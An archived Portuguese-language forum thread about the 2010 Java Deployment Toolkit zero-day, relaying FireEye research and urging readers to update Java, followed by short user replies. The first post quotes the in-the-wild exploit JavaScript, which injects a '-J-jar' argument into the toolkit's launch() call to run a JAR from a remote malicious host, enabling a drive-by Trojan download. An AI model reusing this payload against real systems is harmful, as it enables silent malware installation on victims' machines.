PDA

Ver Versão Completa : Exploit da falha 0-day do JAVA!



CCV_SylarBoon
18-04-2010, 02:03 AM
http://www.csse.monash.edu.au/%7Ecema/courses/CSE5910/generalImages/java-logo-thumb.png


Está falha vem sendo explorada por diversos sites, sendo fácil e simples explora-la. Está que foi divulgada pelo investigador, Google Tavis Ormandy no dia 9 de abril, foi corrigida pela Sun após provas de que estava sendo explorada por alguns sites. Experts da empresa FireEye (http://blog.fireeye.com/research/2010/04/who-is-exploiting-the-java-0day.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+FE_research+%28FireEye+Malwar e+Intelligence+Lab%29) relataram que o exploit é bem simples de ser explorado.

O site que explorava a falha, redirecionava o visitante para uma página de download automático chamadas drive-by, está por sua vez dava ao usuário o download de um Trojan.Downloader(Trojan.Piptea), que em seguida baixava vários pedaços de malwares.

Vamos ver um pedaço do código exploit...

var u = "http: -J-jar -J\\\\zikkuat.com\\50035\\C0.php none";


if (window.navigator.appName == "Microsoft Internet Explorer") {


var o = document.createElement("OBJECT");


o.classid = "clsid:CAFEEFAC- DEC7-0000-0000-ABCDEFFEDCBA";


o.launch(u);

} else {
var o = document.createElement("OBJECT");

var n = document.createElement ("OBJECT");


o.type = "application/npruntime-scriptable- plugineploymenttoolkit"; n.type = "application/java-deployment- toolkit"; document.body.appendChild(o); document.body.appendChild (n); try {o.launch(u); } catch (e) {n.launch(u);

}


Este código estava contido no value3.php, como podemos ver este trecho de código só funciona para o Internet Explorer. A execução bem sucedida do código faz rodar um outro código 50035\\C0.php o qual executa um arquivo .jar(Auto executável do JAVA), veja parte do código


4290


Se quiser ver a imagem em um tamanho melhor acesse (http://blog.fireeye.com/.a/6a00d835018afd53ef01347fe68787970c-pi).

"É óbvio que a simplicidade e confiabilidade deste exploit sera uma arma nas mãos dos vilões nos próximos dias. Além disso, a inexistência de qualquer patch torna tudo pior. Tenho a certeza que em alguns dias, esse exploit se tornará parte das ferramentas dos hackers. Isto significa que até mesmo um garoto com habilidades básicas do computador e más intenções pode começar a ganhar dinheiro com isso" diz
Atif Mushtaq
no blog da FireEye.
É de extrema importância que mantenha seu JAVA atualizado sempre, pois assim estará evitando falhas e consequentemente perda de dados importantes. É importante lembrar que updates abaixo do 20 são inúteis, são suscetíveis a diversas falhas além desta.

Atualize seu java


Baixe agora a atualização (http://www.java.com/pt_BR/download/windows_xpi.jsp?locale=pt_BR&host=www.java.com).

CCV_htrevizi
18-04-2010, 04:45 AM
O pior que não tem sistma operacional a salvo desta falha ja que o Java usa uma especie de maquina virtual.
No qual todos os sistemas operacional tem uma versão desta maquina.
O jeito e manter atualizado o java para não ter problema como este.

CCV_ExWYD
18-04-2010, 06:23 AM
Por isso eu estava achando o PC estranho e estava tendo problema no Java a uns tempos atras. ¬¬

CCV_TITAM
18-04-2010, 09:52 AM
Por isso exclui o Java do meu PC... nao uso ele pra nada msm :)

se exclui nao sei so sei q ele nao fika + no canto inferior direito do meu PC